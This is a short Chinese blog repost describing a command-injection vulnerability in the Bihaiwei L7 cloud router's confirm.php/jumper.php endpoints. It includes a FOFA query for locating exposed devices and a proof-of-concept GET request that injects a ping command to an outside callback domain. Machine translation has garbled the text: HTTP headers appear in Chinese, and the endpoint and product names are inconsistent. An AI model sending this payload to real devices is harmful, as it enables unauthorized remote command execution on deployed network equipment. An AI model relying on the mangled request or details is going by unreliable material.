碧海威L7云路由无线运营版 confirm.php/jumper.php 命令注入漏洞复现(碧海威软路由系统)

碧海威L7云路由无线运营版 confirm.php/jumper.php 命令注入漏洞复现0x01 产品简介 碧海威L7网络设备是 北京智慧云巅科技有限公司下的产品,基于国产化ARM硬件平台,采用软硬一体协同设计方案,释放出产品最大效能,具

0x01 产品简介

碧海威L7网络设备是北京智慧云科技有限公司的产品。基于国产ARM硬件平台,采用软硬件一体化协同设计方案,最大限度地提高产品性能。高扩展性、强大的产品性能、10G吞吐能力支持高性能,包括数万用户同时在线。具有简洁明了的可视化WEB管理界面,支持最新的HTML5,方便移动设备访问管理,具有易于使用和维护的分层多级管理模块,提供设备状态信息和网络流量。通过一目了然的可见性和一键备份/恢复,网络管理变得更加高效。专为酒店、度假村、商场、火车站等商业无线管理者定制的专用网络设备,具有路由、防火墙、流量控制、无线AC控制器、微信认证等多种功能。

0x02 漏洞概述

碧海威L7的verify.php和Jumper.php接口存在RCE漏洞,恶意攻击者可利用该漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器崩溃。

0x03 影响范围

碧海威科技-L7

0x04 复现环境

FOFA:app=\’碧海微科技-L7云路由\’

0x05 漏洞复现

概念验证-1

GET /notice/confirm.php?t=;ping%20fwvjytharz.dgrh3.cn HTTP/1.1

Host:你的IP

Accept: 应用程序/json,文本/javascript,*/*

用户代理: Mozilla/5.0 (Windows NT)

#碧海威L7云路由器以上查看无线运行版本相关内容来自网络。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92550.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月27日 下午2:35
下一篇 2024年6月27日 下午2:52

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注